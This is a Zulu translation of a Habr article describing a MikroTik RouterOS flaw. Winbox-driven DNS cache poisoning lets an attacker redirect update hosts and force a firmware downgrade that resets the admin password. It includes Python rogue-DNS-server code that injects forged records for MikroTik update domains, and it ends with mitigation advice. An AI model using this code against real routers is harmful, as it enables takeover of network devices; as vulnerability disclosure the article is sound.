Amandla okwehlisa ukude amadivayisi asuselwa ku-RouterOS (Mikrotik) abeka amakhulu ezinkulungwane zamadivayisi enethiwekhi engcupheni. Ukuba sengozini kuhlotshaniswa nobuthi benqolobane ye-DNS yephrothokholi ye-Winbox futhi ikuvumela ukuthi ulayishe okuphelelwe yisikhathi (ngokusetha kabusha okuzenzakalelayo kwephasiwedi) noma i-firmware elungisiwe kudivayisi.
Imininingwane yokuba sengozini
Itheminali ye-RouterOS isekela umyalo wokuxazulula ukubheka i-DNS.
Lesi sicelo sisingathwa inambambili ebizwa nge-solvent. I-Resolver ingenye yamabhinari amaningi axhumeka ku-Winbox protocol ye-RouterOS. Ezingeni eliphezulu, "imilayezo" ethunyelwa embobeni ye-Winbox ingadluliselwa kumabhimbambili ahlukahlukene ku-RouterOS ngokusekelwe ohlelweni lwezinombolo olusekelwe kuhlu.
Ngokuzenzakalelayo, i-RouterOS inesici seseva ye-DNS sikhutshaziwe.
Kodwa-ke, noma ngabe umsebenzi weseva ukhutshaziwe, i-router igcina inqolobane yayo ye-DNS.
Uma senza isicelo sisebenzisa i-winbox_dns_request ngokwesibonelo.com, umzila uzogcina umphumela.
Njengoba singacacisa iseva ye-DNS lapho isicelo kufanele sihambe khona, ukufaka amakheli angalungile kuyinto encane. Isibonelo, ungamisa ukuqaliswa kweseva ye-DNS kusuka ukuze uhlale uphendula ngerekhodi elingu-A eliqukethe ikheli le-IP 192.168.88.250.
def dns_response(data):
request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
print("---- Reply:n", reply)
return reply.pack()Manje uma usesha isibonelo.com usebenzisa i-Winbox, ungabona ukuthi inqolobane ye-DNS yomzila inoshevu.
Kunjalo, poisoning example.com akulona usizo kakhulu njengoba umzila ngeke empeleni uwusebenzise. Nokho, umzila udinga ukufinyelela upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com kanye download.mikrotik.com. Futhi ngenxa yelinye iphutha, kungenzeka ukuzifaka ushevu ngesikhathi esisodwa.
def dns_response(data):
request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
reply.add_answer(RR("upgrade.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud2.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("download.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
print("---- Reply:n", reply)
return reply.pack()I-router icela imvume eyodwa, futhi sinikeza ezinhlanu emuva. Irutha ayizigcini zonke lezi zimpendulo ngendlela efanele.
Ngokusobala, lokhu kuhlasela kuyasiza futhi uma i-router isebenza njengeseva ye-DNS, ngoba ivumela amaklayenti omzila ukuthi ahlaselwe.
Lokhu kuhlasela kuphinde kuvumele ukuthi usebenzise ubungozi obungathi sína: yehlisela phansi noma ubuyisele emuva inguqulo ye-RouterOS. Umhlaseli udala kabusha ingqondo yeseva yokubuyekeza, okuhlanganisa i-changelog, futhi iphoqa i-RouterOS ukuthi ibone inguqulo ephelelwe yisikhathi (esengozini) njengeyamanje. Ingozi lapha isekutheni uma inguqulo “ibuyekeziwe”, iphasiwedi yomlawuli isethwe kabusha enanini elizenzakalelayo - umhlaseli angangena ohlelweni ngephasiwedi engenalutho!
Ukuhlasela kuyasebenza impela, naphezu kweqiniso lokuthi isebenzisa amanye ama-vector ambalwa, kuhlanganise nalawo ahlobene nawo , kodwa lena sekuyindlela engasasebenzi futhi ukusetshenziswa kwayo ngezinjongo ezingekho emthethweni akukho emthethweni.
Защита
Ukumane ukhubaze i-Winbox kukuvumela ukuthi uzivikele kulokhu kuhlaselwa. Naphezu kokunethezeka kokuphatha nge-Winbox, kungcono ukusebenzisa iphrothokholi ye-SSH.
Source: www.habr.com